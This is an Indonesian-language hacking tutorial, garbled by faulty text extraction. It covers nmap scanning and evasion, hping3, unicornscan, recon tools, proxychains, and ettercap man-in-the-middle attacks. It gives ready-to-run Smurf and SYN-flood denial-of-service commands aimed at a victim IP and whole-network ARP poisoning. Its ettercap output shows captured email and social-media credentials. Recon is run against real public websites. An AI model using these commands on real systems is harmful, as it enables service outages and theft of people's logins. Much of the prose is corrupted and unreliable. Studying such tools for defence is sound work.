#nmap -sP [ target IP ]
[root@bt]# nmap -sP 192.168.1.6
$.%.B. G+PRH ARP Pin1 Scan
Me-eri#tahka# #-a2 -e%ak.ka# 2i#$ sca##i#$ AR4 @A&&ress Res,%.ti,#
4r,t,c,%B 2a&a tar$et h,st
#nmap -PR [ target IP ]
[root@bt]# nmap -PR 192.168.1.11
PORT STATE SERVICE
21/tcp open ftp
$.%.$>. G+sSH TCP S:N stea/t2 6ort scan ?root@
Tnmap -sS [target IP]
[root@bt]# nmap -sS 192.168.1.36
Note: Host seems down. If it is really up, but blocking our ping
probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 0.50 seconds
[root@zee zee]# nmap -sS 192.168.1.4
PORT STATE SERVICE
22/tcp open ssh
$.%.$>. G+sTH TCP connect?@ 6ort scan ?de3a4/t 4nt4k 4n6ri=i/e1ed 4sers@
#nmap sT [target] Atau nmap -T [flag] -sT [target]
Para5etern7a C
T a&a%ah I8%a$J A /e#&era .#t.k -e#$at.r kece2ata# sca##i#$ ,%eh N-a2.
; "a#$ ter2e%a# &a# 5 "a#$ terce2at.
; ^ Paranoid
1 ^ Sneak7
' ^ Po/ite
0 ^ kece6atan nor5a/8 standard n5a6
3 ^ A11ressi=e85a564 5ene5b4s 3irewa// dan ;arin1an 7an1 ter+3i/ter.
5 ^ Insane
[root@bt]# nmap -T 5 -sT 192.168.1.11
15:57 WIT
PORT STATE SERVICE
21/tcp open ftp
MAC Address: 9A:4D:DF:8C:3A:B5 (Unknown)
seconds
$.9. O6si 6ada 6ort scannin1

G F H G3astH -e-.#$ki#ka# #-a2 .#t.k -e%ak.ka# sca##i#$ terha&a2 1;; 2,rt
2erta-a
#nmap -f [host]
G + P H G6ortH -e-.#$ki# #-a2 ha#"a -e%ak.ka# sca##i#$ terha&a2 2,rt terte#t.
#nmap -p[port] [hosts]
[root@bt]# nmap -p21 192.168.1.11
PORT STATE SERVICE
21/tcp open ftp
(#t.k sca##i#$ %e/ih &ari sat. 2,rt a#&a /isa -e#a-/ahka# ta#&a Iko5aJ .#t.k
-e-isahka# a#tara 2,rt
[root@bt]# nmap -p21,3128 192.168.1.11
PORT STATE SERVICE
21/tcp open ftp
Ata. a#&a /isa -e#a-/ahka# ta#&a E+F .#t.k -e#e#t.ka# ra#$e
[root@bt]# nmap -p21-3128 192.168.1.11
PORT STATE SERVICE
21/tcp open ftp
Ata. /ahka# ke&.a#"a
[root@bt]# nmap -p21,22,24,21-3128 192.168.1.11
A#&a 2.# &a2at -e#e#t.ka# 2,rt &e#$a# -e-as.ka# #a-a ser!ice#"a
[root@bt]# nmap -p ssh,ftp,http 192.168.1.11
Ata. jika a#&a i#$i# -e%ak.ka# sca# ke se%.r.h i2
[root@bt]# nmap -p * 192.168.1.11
Ke-.&ia# a#&a i#$i# -e%ak.ka# sca# &e#$a# ra#$e ti2e 2r,t,c,% terte#t.
TC4
[root@bt]# nmap -p T:1000-2000 192.168.1.11
(D4
[root@bt]# nmap -p U:1000-2000 192.168.1.11
$.). Perinta2 /ainn7a
$.).$. G +3 H 5enent4kan 3ra15ent 6robes da/a5 6aket sebesar A b7tes
#nmap -f 192.168.1.34
$.).%. G +D H 5en114nakan deco7
S"#ta1 .se&Q #-a2 D X&ec,"1> &ec,"'> &ec,"0> etc_ RNDQN.-/erY
Xtar$etVs *4 a&&Y
#nmap -D 192.168.1.45 192.168.1.46 192.168.1.47 192.168.1.4
$.).9. G +sI H Idd/e Scann
Me-/.at #-a2 -e%ak.ka# sca## &a%a- -,&e /ack$r,.#& &a# -e-akai i2 a&&ress
terte#t. > sehi#$$a seaka#aka# #-a2 -e%ak.ka# sca## &ari h,st /er/e&a
[root@bt]# nmap -sI 192.168.1.1 192.168.1.4
$.).). G++s6oo3H S6oo3in1 5ac address
Me-/.at #-a2 -e%ak.ka# sca## &e#$a# -e-a%s.ka# -ac a&&ress terte#t.
C,/a sca## ke i2 se#&iri > #a#ti aka# ter%ihat 2er/e&aa# &a%a- -ac a&&ress
[root@bt]# nmap -sT -PN --spoof-mac apple 192.168.1.4
Spoofing MAC address 00:03:93:74:DC:88 (Apple Computer)
PORT STATE SERVICE
22/tcp open ssh
$.).*. G++rando5iPe+2ostsH
-e%ak.ka# sca## h,st secara ra#&,-
#nmap -randomize-hosts 192.168.1.1-100
$.)... G++so4rce+6ortHDG1H
nmap source-port 53 192.168.1.36
nmap g 53 192.168.1.36
[root@zee zee]# nmap --source-port 21 192.168.1.4
17:01 WIT
PORT STATE SERVICE
22/tcp open ssh
seconds
$.*. O6si O4t64t
Me#e#t.ka# hasi% 2e#"i-2a#a# ,.t2.t
$.*.$. enent4kan o4t64t da/a5 bent4k t<t
[root@zee zee]# nmap -oN hasil.txt 192.168.1.6
Note: Host seems down. If it is really up, but blocking our ping
probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 0.45 seconds
[root@zee zee]# nmap -oN hasil.txt 192.168.1.4
PORT STATE SERVICE
22/tcp open ssh
$.*.%. enent4kan o4t64t da/a5 bent4k <5/
[root@zee zee]# nmap -oX scanme.xml 192.168.1.4
PORT STATE SERVICE
22/tcp open ssh
$.*.9. enent4kan o4t64t da/a5 bent4k scri6tkiddies
[root@zee zee]# nmap -oS kiddiescan.txt 192.168.1.4
PORT STATE SERVICE
22/tcp open ssh
$... Perinta2 # Perinta2 Ad=ance
$...$. FIN scan ?+sF@
Ti&ak -e#$iri-ka# /it @hea&er +%a$ TC4 a&a%ah ;B
$...%. N4// scan ?+sN@
Ha#"a -e#set /it 8*N TC4.
$...9. -5as scan ?+s-@
Me#set +%a$ 8*N> 4SH> &a# (RG> -e#era#$i 2aket se2erti se/.ah 2,h,# Nata%.
$...). Scann Den1an 5en114nakan scri6t k24s4s
s7nta< C n5a6 #scri6tQbroadcast Etar1et IPF
4i%iha# scri2t &a2et &i te-.ka# 2a&a I!usr!local!share!nmap!scriptsJ
c,#t,hQ
nmap script=smb-check-vulns target IP
nmap script=sql-injection target IP
nmap script=mongodb-databases target IP
nmap script=mac-geolocation target IP
nmap script=broadcast-netbios-master-browser target IP
Ta-/aha# ,2si 2eri#tah
X ! Y -e#a-2i%ka# ,.t2.t !er/,se
X & Y -e#a-2i%ka# &e/.$$i#$
%. HPING
H2i#$ a&a%ah se/.ah TC4A*4 asse-/%er. Ti&ak se2erti 2i#$
c,--a#& "a#$ ha#"a &a2at -e#$iri- *CM4 ech, reU.est>
h2i#$ j.$a &a2at -e#$iri- 2aket (+-, )D-, I+&-> &a# RA/6
I- 2r,t,c,%s.
%.$. Ke14naan HPING
` Me#$etes +ire<a%%
` 4,rt sca##i#$
` Net<,rk testi#$> &e#$a# -e#$$.#aka# 2r,t,k,% "a#$ /er/e&a/e&a
` Re-,te )S +i#$er2ri#ti#$
` Re-,te .2ti-e $.essi#$
` TC4A*4 stacks a.&iti#$
` Tracer,.te
` Ma#.a% 2ath MT( &isc,!eri#$
%.%. "ebera6a Perinta2 HPING
(#t.k -e%ihat -e#. %ist c,--a#&
#hping3 -help
%.%.%. For5at 6erinta2 standart
#hping3 -I eth0 -S 66.94.234.13 -p 80 -c 3
root@bt:~# hping3 -I wlan0 -S 74.125.235.19 -p 80 -c 3
HPING 74.125.235.19 (wlan0 74.125.235.19): S set, 40 headers + 0
data bytes
len=46 ip=74.125.235.19 ttl=56 id=54551 sport=80 flags=SA seq=0
win=5720 rtt=51.7 ms
--- 74.125.235.19 hping statistic ---
3 packets tramitted, 3 packets received, 0% packet loss
round-trip min/avg/max = 47.6/49.6/51.7 ms
Ket C
* Q i#ter+ace
S Q i2 a&&ress
4 Q 2,rt t.j.a#
C Q ca2t.re 2aket %i-it
Ni/ai F/a1
+%a$s^SA aa ,2e#
+%a$s^RA aa c%,se&
%.%.9. Testin1 ic56
root@bt:~# hping3 -1 google.com
HPING google.com (wlan0 74.125.236.84): icmp mode set, 28
headers + 0 data bytes
len=46 ip=74.125.236.84 ttl=55 id=20308 icmp_seq=0 rtt=80.9 ms
len=46 ip=74.125.236.84 ttl=55 id=20309 icmp_seq=1 rtt=79.8 ms
%.%.). Tracero4te den1an ICP
root@bt:~# hping3 --traceroute google.com
HPING google.com (wlan0 74.125.236.82): NO FLAGS are set, 40
hop=1 TTL 0 during transit from ip=192.168.1.1 name=UNKNOWN
hop=1 hoprtt=1.3 ms
%.%.*. e5eriksa Port Tertent4
Me#$iri-ka# 2aket s"# ke 2,rt terte#t.
root@bt:~# hping3 -V -S -p 80 -s 5050 192.168.1.1
using wlan0, addr: 192.168.1.10, MTU: 1500
HPING 192.168.1.1 (wlan0 192.168.1.1): S set, 40 headers + 0 data
bytes
len=46 ip=192.168.1.1 ttl=254 id=29486 tos=0 iplen=44
sport=80 flags=SA seq=0 win=1024 rtt=1.9 ms
seq=649068544 ack=1864136339 sum=4f4 urp=0
Menentukan range port ping dengan kecepatan tertentu
%.%.*. ACK Scan
Me-eriksa a2akah h,st &a%a- kea&aa# hi&.2 > sa#$at /er$.#a jika 2i#$ X ic-2
2,rt Y &i /%,ck
root@bt:~# hping3 -c 1 -V -p 80 -s 5050 -A
indonesianbacktrack.or.id
HPING indonesianbacktrack.or.id (wlan0 184.22.78.115): A set, 40

%.%... Pin1 scann 6ada 4k4ran 6ort tertent4
syntax : hping3 -I eth0 -S [ip-target] -M 3000 -p ++21
--fast
ketera#$a#
e12%,re 2,rt &ari '1 keatas &e#$a# 2eri#tah 2 ZZ'1 @'1>''>'0>etcB.
+ast ,2ti,# .#t.k -e#$at.r kece2ata# sca##er.
M 0;;; setti#$ TC4 seU.e#ce ke 0;;;
root@bt:~# hping3 -I wlan0 -S 74.125.235.19 -p 80 -c 3
HPING 74.125.235.19 (wlan0 74.125.235.19): S set, 40 headers + 0
data bytes
%.%.&. TCP -AST Scann
set seU.e#ce #.-/er ke ; &a# set URG I PSH I FIN &a%a- 2aket sehi#$$a jika
2,rt tc2 2a&a -esi# tar$et &a%a- kea&aa# tert.t.2 -aka tar$et -esi# aka# -ere2%"
TC4 RST se&a#$ka# jika ter/.ka -aka aka# se/a%ik#"a.
root@bt:# hping3 -c 1 -V -p 80 -s 5050 -M 0 -UPF 192.168.1.1
HPING 192.168.1.1 (wlan0 192.168.1.1): FPU set, 40 headers + 0
data bytes
%.%.A. S54r3 Attack
#hping3 -1 --flood -a VICTIM_IP BROADCAST_ADDRESS
%.%.B. DOS 'AND Attack
hping3 -V -c 1000000 -d 120 -S -w 64 -p 445 -s 445 --flood
--rand-source VICTIM_IP
--flood: sent paket dalam keadaan cepat dan tidak
menampilkan reply
--rand-dest: random desitinasi address
-V <-- Verbose
-c --count: paket count
-d --data: data size
-S --syn: set SYN flag
-w --win: winsize (default 64)
-p --destport [+][+]<port> destination port(default 0)
ctrl+z inc/dec
-s --baseport: base source port (default random)
9 UNICORN SCANNER
9.$. Pen1ena/an Unicorn
(#ic,r#sca# a&a%ah N-ayload *enderN -e#$a$.-ka# "a#$ j.$a &a2at
/erti#&ak se/a$ai se/.ah sca##er as"#chr,#,.s
9.$.$. Unicorn Di "acktrack *
S.&ah teri#sta%% secara &e+a.%t &a# &a2at &ii#sta%% jika -e-a#$
ti&ak &ite-.ka#
9.%. Perinta2 Dasar
#unicornscan [host/ip]
9.%.$. UDP+Protoco/+S6eci3ic+Pa7/oad "ased Scannin1
#unicornscan -r200 -mU -I 192.168.0.0/24:53
ketera#$a# Q
r ^ -e#e#t.ka# j.-%ah 2aket 2er &etik
-^ -e#e#t.ka# -,&e @ tc2 ^ T .&2 ^ ( B
* ^ set a$ar &is2%a" &a2at se$era &i ta-2i%ka# 2a&a %a"ar
9.%.%. Sa=in1 to PCAP
#unicornscan 10.23.0.0/22:161 -r1000 -I -v -mU -R3 -P
"not port 162" \ -w snmp.pcap -s 1;.'0.;.1
)2ti,#s Q
-v Set verbose output (Untuk multiple setting, Ex. -vvv)
-P not port 162 Pcap filter (man tcpdump)
-w snmp.pcap Menulis hasil dari scann ke file snmp.pcap
-R 3 Mengambil kembali probe dalam pengulangan 3 kali
-s 10.23.0.1 Mengirim paket ke ip address yang ditentukan
-W 6 Mengirim paket melalui os linux
9.9. Perinta2 'ainn7a
jika a#&a i#$i# -e-akai S:N sca# +5T
jika a#&a i#$i# -e-akai ACK sca# +5TsA
jika a#&a i#$i# -e-akai 8i# sca# +5TsF
jika a#&a i#$i# -e-akai N.%% sca# +5Ts
jika a#&a i#$i# -e-akai #-a2 st"%e C-as sca# +5TsFPU
Jika a#&a i#$i# -e-akai se-.a ,2ti,#s ,# +5TFSRPAUEC
) ARPING
).$. Pen1ena/an ARPING
Ar2i#$ a&a%ah t,,%s "a#$ /er$.#a .#t.k -e-eriksa &.2%ikat *4.
).%. Perinta2 ARPING
arping -I eth0 -c 2 192.168.1.7
keterangan
-I [ interface ]
-c [ set jumlah send paket ]
).%.$. Deteksi a/a5at IP D46/ikat
sudo arping -D -I <interface-name> -c 2 <IP-ADDRESS-TO-
TEST>
* !HAT!E"
*.$. Pen1ena/an !2at!eb
=hat<e/ a&a%ah e#.-erati,# <e/ i#+,r-ati,#
$atheri#$ t,,%s "a#$ -e-i%iki ke-a-2.a# .#t.k .#t.k
-e#cari i#+,r-asi E i#+,r-asi DNS> L,kasi ser!er> s./
&,-ai#> &%%
*.%. Perinta2 # 6erinta2 Pada !2atweb
Secara &e+a.%t <hat<e/ /era&a 2a&a &irekt,ri !pentest!enumeration!0eb!0hat0eb
syntax : ./whatweb -v [hosts]
root@bt:/pentest/enumeration/web/whatweb# ./whatweb -v kaskus.us
http://kaskus.us/ [302]
http://kaskus.us [302] HTTPServer[lumanau.web.id], Title[302
Found], Country[INDONESIA][ID],
RedirectLocation[http://www.kaskus.us/], IP[112.78.131.2]
URL : http://kaskus.us
Status : 302
Country
---------------------------------------------------------------
Description: GeoIP IP2Country lookup. To refresh DB,
replace
IpToCountry.csv and remove country-ips.dat.
GeoIP database
from http://software77.net/geo-ip/. Local
IPv4 addresses
are represented as ZZ according to an ISO
convention.
Lookup code developed by Matthias Wachter
for rubyquiz.com
and used with permission.
String : INDONESIA
Module : ID
HTTPServer
---------------------------------------------------------------
Description: HTTP server header string. This plugin also
attempts to
identify the operating system from the
server header.
String : lumanau.web.id (from server string)
IP
---------------------------------------------------------------
Description: IP address of the target, if available.
String : 112.78.131.2
RedirectLocation
-----------------------------------------------------------
Description: HTTP Server string location. used with
http-status 301 and
302
String : http://www.kaskus.us/ (from location)

Title
---------------------------------------------------------------
Description: The HTML page title
String : 302 Found (from page title)
http://www.kaskus.us/ [200]
http://www.kaskus.us/ [200] X-UA-Compatible[IE=7],
MetaGenerator[vBulletin 3.8.0], UncommonHeaders[cluster],
Cookies[kskssessionhash], VBulletin[3.8.0],
HTTPServer[lumanau.web.id], Title[Kaskus - The Largest
Indonesian Community], Country[INDONESIA][ID], Frame, Prototype,
PasswordField[vb_login_password], Google-
API[ajax/libs/yui/2.9.0/build/connection/connection,ajax/libs/yu
i/2.9.0/build/yahoo], vbPortal, HttpOnly[kskssessionhash],
Google-Analytics[UA-132312-1], IP[112.78.131.2]
URL : http://www.kaskus.us/
Status : 200
Cookies
---------------------------------------------------------------
Description: Display the names of cookies in the HTTP
headers. The
values are not returned to save on space.
String : kskssessionhash
Country
---------------------------------------------------------------
Description: GeoIP IP2Country lookup. To refresh DB,
replace
IpToCountry.csv and remove country-ips.dat.
GeoIP database
from http://software77.net/geo-ip/. Local
IPv4 addresses
are represented as ZZ according to an ISO
convention.
Lookup code developed by Matthias Wachter
for rubyquiz.com
and used with permission.
String : INDONESIA
Module : ID
Frame
---------------------------------------------------------------
Description: This plugin detects instances of frame and
iframe HTML
elements.
Google-API
---------------------------------------------------------------
Description: This plugin identifies references to Google
API in
<script>.
String :
ajax/libs/yui/2.9.0/build/connection/connection,ajax/libs/yui/2.
9.0/build/yahoo
Google-Analytics
---------------------------------------------------------------
Description: Google Analytics is the enterprise-class
web analytics
solution that gives you rich insights into
your website
traffic and marketing effectiveness.
Homepage:
www.google.com/analytics/
Account : UA-132312-1 (from gaq.push)
HTTPServer
---------------------------------------------------------------
Description: HTTP server header string. This plugin also
attempts to
identify the operating system from the
server header.
String : lumanau.web.id (from server string)
HttpOnly
---------------------------------------------------------------
Description: If the HttpOnly flag is included in the
HTTP set-cookie
response header and the browser supports it
then the cookie
cannot be accessed through client side
script - More Info:
http://en.wikipedia.org/wiki/HTTP_cookie
String : kskssessionhash
IP
---------------------------------------------------------------
Description: IP address of the target, if available.
String : 112.78.131.2
MetaGenerator
--------------------------------------------------------------
Description: This plugin identifies meta generator tags
and extracts its
value.
String : vBulletin 3.8.0
PasswordField
--------------------------------------------------------------
Description: find password fields
String : vb_login_password (from field name)
Prototype
---------------------------------------------------------------
Description: Javascript library
Title
---------------------------------------------------------------
Description: The HTML page title
String : Kaskus - The Largest Indonesian Community
(from page title)
UncommonHeaders
---------------------------------------------------------------
Description: Uncommon HTTP server headers. The blacklist
includes all
the standard headers and many non standard
but common ones.
Interesting but fairly common headers
should have their own
plugins, eg. x-powered-by, server and x-
aspnet-version.
Info about headers can be found at
www.http-stats.com
String : cluster (from headers)
VBulletin
---------------------------------------------------------------
Description: VBulletin is a PHP forum.
Version : 3.8.0 (from version)
Version : 3.8.0 (from version)
X-UA-Compatible
---------------------------------------------------------------
Description: This plugin retrieves the X-UA-Compatible
value from the
HTTP header and meta http-equiv tag. - More
Info:
http://msdn.microsoft.com/en-
us/library/cc817574.aspx
String : IE=7
vbPortal
---------------------------------------------------------------
Description: Portal and CMS for vBulletin - homepage:
http://www.vbportal.com/
. DNSENU
..$. Pen1ena/an DNSENU
DNSE#.- ata. D,-ai# #a-e s"ste- e#.-erati,# -er.2aka# t,,%s i#+,r-ati,#
$atheri#$ "a#$ -e-i%iki ke-a2.a# <h,is &i-a#a DNSE#.- aka# -e#a-2i%ka#
i#+,r-asii#+,r-asi 2e#ti#$ se2erti NS> M1 @ -ai% ser!er B > &a# scra2i#$ &ari
$,,$%e search e#$$i#e. DNS E#.- -e%e#$ka2i a2a "a#$ ti&ak &ita-2i%ka# 2a&a
e#.-erati,# i#+,r-ati,# $atheri#$ %ai##"a se2erti <hat<e/.
..%. Perinta2 # 6erinta2 6ada DNSENU
Mas.k ter%e/ih &ah.%. ke &irekt,ri
!pentest!enumeration!dns!dnsenum!
syntax : ./dnsenum.pl --enum [hosts]
root@bt:/pentest/enumeration/dns/dnsenum# ./dnsenum.pl --enum
dnsenum.pl VERSION:1.2.2
Warning: can't load Net::Whois::IP module, whois queries
disabled.
----- www.indonesianbacktrack.or.id -----

Host's addresses:
__________________
indonesianbacktrack.or.id 10327 IN A
184.22.78.115
Name Servers:
______________
dragon2.indonesianbacktrack.or.id 14400 IN A
184.22.78.115
184.22.78.115
184.22.78.116
27.111.34.146
184.22.78.116
27.111.34.145
27.111.34.146
27.111.34.145
Mail (MX) Servers:
___________________
indonesianbacktrack.or.id 603 IN A
184.22.78.115
b373994142df4a88bf1e00a3a512eb.pamx1.hotmail.com 3600 IN
A 65.54.188.109
b373994142df4a88bf1e00a3a512eb.pamx1.hotmail.com 3600 IN
A 65.54.188.78
Trying Zone Transfers and getting Bind Versions:
_________________________________________________
Trying Zone Transfer for www.indonesianbacktrack.or.id on
dragon8.indonesianbacktrack.or.id ...
AXFR record query failed: NOERROR
dragon8.indonesianbacktrack.or.id Bind Version:9.7.1-P2
Scraping www.indonesianbacktrack.or.id subdomains from Google:
_______________________________________________________________
---- Google search page: 1 ----
Google Results:
________________
perhaps Google is blocking our queries.
Check manually.
brute force file not specified, bay.
& PRO-:CHAINS
&.$. Pen1ena/an Pro<7c2ain
4r,1"chai# @ ra#tai 2r,1" B -e-i%iki ke-a-2.a# .#t.k (+- tunnel > &a# D>*
proxy. S.2,rt terha&a2 ?((-> socks# > &a# socks= proxy server> "a#$ ke-.&ia# &i
/a#$.# h./.#$a# se2erti -ata ra#tai.
4r,1"chai#s Secara .-.- &i $.#aka# .#t.k Q
Me#"e-/.#"ika# i2
Me#ja%a#ka# 2r,$ra-2r,$ra- ,#%i#e terte#t. &e#$a# 2r,1" ser!er
acces #et<,rk &ari %.ar &e#$a# re!erse 2r,1" @ !2# B
&.%. Kon3i14rasi 6ro<7c2ains
Se/a$ai 2e#$$.#a /acktrack > a#&a s.&ah ti&ak 2er%. kes.%ita# &a%a- -e#$i#sta%
t,,%s i#i kare#a te%ah teri#sta%% secara &e+a.%t 2a&a siste- ,2erasi /acktrack. (#t.k
-e#ja%a#ka# > -e#e#t.ka# 2r,1" serta -e#e#t.ka# /a$ai-a#a #a#ti#"a t,,% i#i
aka# /ekerja> kita har.s -e#$e&it#"a secara -a#.a% 2a&a k,#+i$.rasi +i%e.
K,#+i$.rasi 2r,1"chai# secara &e+a.%t ter&a2at 2a&a AetcA2r,1"chai#s.c,#+
&.9. etode 6roses 6ro<7c2ains
Met,&e 2a&a 2r,ses chai# &a2at a#&a te-.ka# 2a&a +i%e k,#+i$.rasi. Jika a#&a
he#&ak -e#$$.#aka# sa%ah sat. -et,&e "a#$ &isia2ka# -aka a#&a har.s -e%ak.ka#
.#c,--e#t ata. -e#$ha2.s ta#&a ITJ &i &e2a# -,&e. Da# .#t.k -e#&isa/%e -,&e
ta-/ahka# ta#&a ITJ &i&e2a# -,&e.
Keti$a -et,&e "a#$ a&a 2r,1"chai#s a#tara %ai#
+d7na5icRc2ain Gd+c2ainH Q Me-2r,ses 2r,1" "a#$ kita ta-/ahka# ke-.&ia#
-e%e<ati 2r,1"2r,1" "a#$ s.&ah -ati ata. ti&ak -e-i%iki kea/saha# k,#ekti+itas
%a$i.
+rando5Rc2ain Gr+c2ainH Q Me#$a-/i% secara acak 2r,1" 2a&a %ist k,#+i$.rasi
+strictRc2ain Gs+c2ainH Q -e#$a-/i% 2r,1" se2erti "a#$ &i%ak.ka# &"#a-icFchai# >
#a-.# ka%, &chai# -e%e<ati @ ski2 B 2r,1"2r,1" "a#$ te%ah -ati schai#
-e%ak.ka# "a#$ se/a%ik#"a.
K,#+i$.rasi 2r,1"chai#s ter&a2at I!etc!proxychains1confJ ter%a%. /a#"ak c,--e#t
&isa#a kare#a it. a&a /aik#"a kita /.at k,#+i$.rasi /ar.. Se/e%.-#"a /ack.2 &.%.
+i%e k,#+i$.rasi as%i ke-.&ia# /.at "a#$ /ar..
C,#t,h +i%e k,#+i$.rasi 2r,1"chai#s.c,#+ "a#$ te%ah &i se&erha#aka#
#konfigurasi proxychains
#metode
dynamic_chain
#strict_chain
#random_chain
#opsi
#chain_len = 2
#quiet_mode
proxy_dns
tcp_read_time_out 15000
tcp_connect_time_out 8000
#tambahkan proxy list di bawah ini..
[ProxyList]
socks4 127.0.0.1 9050
#socks4 219.235.228.182 1080
#socks4 114.113.228.198 1080
#socks4 92.242.243.4 1080
#http 122.72.26.199 80
http 118.96.248.196 8080
http 110.139.60.228 8080
#http 122.200.54.42 80
#http 103.22.248.100 3128
#http 121.52.87.63 8080
#http 218.207.216.235 80
#http 188.29.80.147 51113
#http 78.105.21.4 32093
&.). Perinta2 dan 6en114naan
root@bt: proxyresolv targethost.com ( Perintah ini di gunakan
untuk resolve host names via proxy atau tor )
root@bt: proxychains firefox site.com ( Membukan situs yang
diinginkan dengan proxychains melalui firefox )
root@bt: proxychains telnet target ( Digunakan untuk
konektivitas ke jaringan telnet )
"A" (
AN IN THE ID'E ATTACK
Oleh : zee eichel
$. IT ATTACK
M.#$ki# /a#"ak "a#$ -e#$ira t.j.a# &ari sera#$a# M*TM a&a%ah .#t.k -e#"a&a2
k,-.#ikasi &ata rahasia> se2erti s#i++i#$. S#i++i#$ /isa &ise/.t se/a$ai 2assi!e attack
kare#a attacker ti&ak -e%ak.ka# ti#&aka# a2ab se%ai# -e-a#ta. &ata "a#$ %e<at.
Me-a#$ /e#ar &e#$a# sera#$a# M*TM> se,ra#$ attacker /isa -e#$etah.i a2a "a#$
&i/icaraka# ,%eh &.a 2ihak "a#$ /erk,-.#ikasi. Na-.# se/e#ar#"a kek.ata#
ter/esar &ari M*TM /.ka# 2a&a ke-a-2.a# s#i++i#$#"a> #a-.# 2a&a ke-a-2.a#
-e#ce$at &a# -e#$./ah k,-.#ikasi sehi#$$a M*TM attack /isa &ise/.t se/a$ai
je#is seran1an akti3.
$.$. Proses ter;adin7a seran1an IT
se,ra#$ attacker aka# /era&a &i te#$ahte#$ah k,-.#ikasi a#tara &.a 2ihak. Se%.r.h
2e-/icaraa# "a#$ terja&i &i a#tara -ereka har.s -e%a%.i attacker &.%.
Sehi#$$a se,ra#$ Attacker &e#$a# %e%.asa -e%ak.ka# 2e#"a&a2a#> 2e#ce$ata#>
2e#$./aha# /ahka# -e-a%s.ka# k,-.#ikasi.
$.%. Ar6 Poisonin1
ARP a&a%ah 2r,t,c,% "a#$ /er+.#$si -e-etaka# i2 a&&ress -e#ja&i &A+ address.
Se/a$ai 2e#$h./.#$ a#tara &ata %i#k %a"er &a# i2 %a"er 2a&a (+-!I-. Se-.a
k,-.#ikasi "a#$ /er/asis ether#et -e#$$.#aka# 2r,t,c,% AR4 i#i. *#ti#"a setia2
k,-2.ter ata. &e!ice "a#$ aka# /erk,-.#ikasi 2asti aka# -e%ak.ka# tra#saksi ata.
t.kar -e#.kar i#+,r-asi terkait a#tara *4 &a# MAC a&&ress tra#saksi aka# &isi-2a#
&i &a%a- cache @* A#&a.
root@bt:# arp
Address HWtype HWaddress Flags Mask
Iface
192.168.1.4 ether 44:87:fc:56:86:85 C
wlan0
192.168.1.1 ether c8:64:c7:4b:b8:d0 C
wlan0
!ARNING S
$.9. Konse6 seran1an
$.9.$. "e3ore # A3ter
Me%ak.ka# r,.ti#$ 2erta-a ka%i 2a&a #et<,rk kita .#t.k -e#$etah.i sia2a &a# a&a
/era2a "a#$ terh./.#$ &e#$a# jari#$a# terse/.t.
# route -n
root@nindya-putri:/pentest/enumeration/dns/dnsenum# route -n
Destination Gateway Genmask Flags Metric Ref
Use Iface
0.0.0.0 192.168.1.1 0.0.0.0 UG 100 0
0 wlan0
192.168.1.0 0.0.0.0 255.255.255.0 U 0 0
0 wlan0
# route help > penggunaan lainnya
%. IT !ITH ETTERCAP
Ba#"ak t,,%s &a# teh#ik -e#$e#ai M*TM > #a-.# saat i#i sa"a ha#"a aka# -e-/eri
c,#t,h -e#$e#ai /e/era2a teh#ik M*TM &e#$a# etterca6.
%.$. etode seran1an ARP 6oisonin1 dan Sni33in1 attack
Jika kita -e#$i#$i#ka# sera#$a# sa#$ *0iss Army $nife i#i /er+.#$si &e#$a# /aik
2a&a k,#eksi jari#$a# a-a# ss% -aka kita har.s -e-astika# /ah<a
re&irFc,--a#&F,# scri2t 2a&a etter.c,#+ akti+. Secara &e+a.%t etter.c,#+ &i /acktrack
%i#.1 R1 /era&a 2a&a &irekt,ri
/etc/etter.conf
(#t.k -e#$akti+ka# scri2t ta&i > /.ka +i%e etter.c,#+ &e#$a# e&it,r kesa"a#$a# a#&a
ke-.&ia# .#c,--e#t /aris &i /a<ah i#i.
# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp
--dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp
--dport %port -j REDIRECT --to-port %rport"
%.$.$. etode seran1an etteca6
%.$.$.$. etode seran1an secara 5en7e/4r42
Ya#$ sa"a -aks.&ka# &e#$a# -et,&e sera#$a# secara -e#"e%.r.h a&a%ah sera#$a#
"a#$ -e#.j. ke2a&a se%.r.h h,st &i /a<ah sat. r,.ter @ gate0ay B.
Sa#$at ti&ak &i sara#ka# jika tar$et -e-i%iki jari#$a# "a#$ /esar. Aka# -e-/.at
k,-2,sisi k,-2.ter %a-/at. M.#$ki# &e#$a# s2ec har&<are "a#$ ti#$$i kita
-e-i%iki ke-a-2.a# .#t.k -e%ak.ka# -et,&e sera#$a# i#i.
K,-/i#asi s"#ta1 .#t.k sera#$a# ke se%.r.h #et<,rk
ettercap -T -q -M ARP // //
-q = quite mode ( verbose )
C,#t,h Hasi% ,.t2.t Q
root@bt{~}:ettercap -T -q -i wlan0 -M ARP // //
ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA
Listening on wlan0... (Ethernet)
wlan0 -> F4:EC:38:99:60:F3 192.168.1.6 255.255.255.0
Privileges dropped to UID 0 GID 0...
28 plugins
39 protocol dissectors
53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services
Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
* |==================================================>| 100.00
%
5 hosts added to the hosts list...
ARP poisoning victims:
GROUP 1 : ANY (all the hosts in the list)
Starting Unified sniffing...
Text only Interface activated...
Hit 'h' for inline help
HTTP : 69.171.228.13:443 -> USER: teconhackers@yahoo.com PASS:
testers INFO: https://www.facebook.com/
HTTP : 66.163.169.186:443 -> USER: niceday PASS: 299281 INFO:
https://login.yahoo.com/config/login_verify2?&.src=ym
%.$.$.% etode seran1an ter2ada6 sat4 s6esi3ik IP
Jika jari#$a# ter%a%. /esar a&a /aik#"a kita -e#"era#$ tar$et i2 "a#$ &i te#t.ka#.
Sera#$a# terse/.t &i -.%ai &e#$a# s"#ta1
ettercap -T -q -F ig.ef -M ARP /xxx.xxx.xxx.xxx/ //
Se/a$ai c,#t,h kita -e#"era#$ i2 tar$et AB1A"C1A1A#
hasi% ,.t2.t Q
zee@eichel{~}:ettercap -T -q -i wlan0 -M ARP /192.168.1.14/ //
wlan0 -> F4:EC:38:99:60:F3 192.168.1.6 255.255.255.0
28 plugins
53 ports monitored
2183 known services
* |==================================================>| 100.00
%
GROUP 1 : 192.168.1.14 08:00:27:45:C0:C0
HTTP : 72.14.203.84:443 -> USER: zee-eichel@gmail.com PASS:
